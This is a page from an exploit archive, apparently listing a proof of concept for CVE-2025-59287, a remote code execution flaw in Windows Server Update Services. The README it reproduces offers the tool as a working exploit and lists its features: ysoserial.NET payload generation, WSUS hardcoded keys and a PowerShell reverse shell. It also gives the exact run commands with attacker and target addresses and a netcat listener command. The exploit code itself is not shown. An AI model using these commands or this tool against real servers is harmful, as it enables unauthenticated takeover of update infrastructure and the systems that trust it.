Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-59287 PoC — Windows Server Update Service (WSUS) Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title: Windows Server Update Service (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)
Description:Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network.
Description
It is an Working exploit of new CVE found in WSUS.
Readme
# CVE-2025-59287 WSUS RCE Exploit

Automated exploit for Windows Server Update Services (WSUS) unauthenticated remote code execution vulnerability.

## Vulnerability Details

- **CVE ID:** CVE-2025-59287
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network
- **Authentication:** None required
- **Impact:** Remote Code Execution as SYSTEM

## Features

✅ Fully automated payload generation  
✅ Auto-downloads ysoserial.NET dependency  
✅ Built-in reverse shell listener  
✅ Cross-platform support (Windows/Linux/Mac)  
✅ AES encryption with WSUS hardcoded keys  
✅ PowerShell reverse shell payload

## Requirements

pip install -r requirements.txt

### Python Dependencies

### .NET Runtime (Auto-detected)
- **Windows:** .NET Framework (built-in)
- **Linux/Mac:** Wine or Mono
Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete


## Installation

Clone or download exploit files

cd CVE-2025-59287-exploit

Run exploit (auto-downloads ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444


## Usage

### Basic Exploitation

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

### if want session on another listener

Terminal 1: Start netcat listener

nc -lvnp 4444

Terminal 2: Run exploit without built-in listener

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →